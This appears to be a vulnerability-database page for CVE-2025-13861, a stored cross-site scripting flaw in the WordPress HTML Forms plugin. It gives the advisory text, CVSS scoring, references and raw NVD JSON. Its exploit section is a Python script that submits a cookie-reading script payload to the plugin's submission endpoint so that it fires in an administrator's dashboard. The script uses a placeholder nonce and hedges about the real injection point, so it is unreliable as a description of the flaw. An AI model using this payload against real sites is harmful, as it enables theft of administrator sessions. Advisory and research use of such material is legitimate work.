CVE-2025-13861

Description

The HTML Forms – Simple WordPress Forms Plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting in all versions up to and including 1.6.0 due to insufficient sanitization of fabricated file upload field metadata before displaying it in the WordPress admin dashboard. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute whenever an administrator accesses the form submissions page.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

HTML Forms plugin <= 1.6.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13861 PoC - WordPress HTML Forms Plugin Stored XSS
# Target: WordPress site with HTML Forms plugin <= 1.6.0

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com"

# Malicious payload for file upload field metadata
# This payload exploits the lack of sanitization in file field metadata handling
xss_payload = '<script>alert(document.cookie)</script>'

# The plugin stores file metadata without proper sanitization
# Payload can be injected through crafted form submission
form_data = {
    'html-form-id': '1',
    'field-name': 'file_upload',
    'field-value': xss_payload,
    '_wpnonce': 'attacker_need_to_obtain'  # WordPress nonce may be bypassed in some configs
}

# Step 1: Submit form with malicious file metadata
submit_url = f"{target_url}/wp-json/html-forms/v1/submissions"
response = requests.post(submit_url, data=form_data)

print(f"[+] Form submission sent: {response.status_code}")

# Step 2: When admin views submissions, XSS will execute
admin_view_url = f"{target_url}/wp-admin/admin.php?page=html-forms&view=submissions&form_id=1"
print(f"[+] Malicious payload stored. Admin must visit: {admin_view_url}")
print(f"[+] XSS payload: {xss_payload}")

# Note: Actual exploitation may require:
# 1. Bypassing WordPress nonce protection in certain configurations
# 2. Finding valid form ID
# 3. Understanding the specific injection point in file metadata

print("\n[!] This PoC is for educational purposes only.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13861
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13861
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13861/
[4] VulDB https://vuldb.com/cve/CVE-2025-13861
[5] https://plugins.trac.wordpress.org/browser/html-forms/trunk/src/functions.php#L321
[6] https://plugins.trac.wordpress.org/browser/html-forms/trunk/src/functions.php#L357
[7] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3419926%40html-forms%2Ftrunk&old=3407043%40html-forms%2Ftrunk&sfp_email=&sfph_mail=
[8] https://www.wordfence.com/threat-intel/vulnerabilities/id/52e2f1b9-d240-4813-9124-51bd6b047553?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13861", "sourceIdentifier": "[email protected]", "published": "2025-12-17T05:16:10.977", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HTML Forms – Simple WordPress Forms Plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting in all versions up to and including 1.6.0 due to insufficient sanitization of fabricated file upload field metadata before displaying it in the WordPress admin dashboard. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute whenever an administrator accesses the form submissions page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/html-forms/trunk/src/functions.php#L321", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/html-forms/trunk/src/functions.php#L357", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3419926%40html-forms%2Ftrunk&old=3407043%40html-forms%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/52e2f1b9-d240-4813-9124-51bd6b047553?source=cve", "source": "[email protected]"}]}}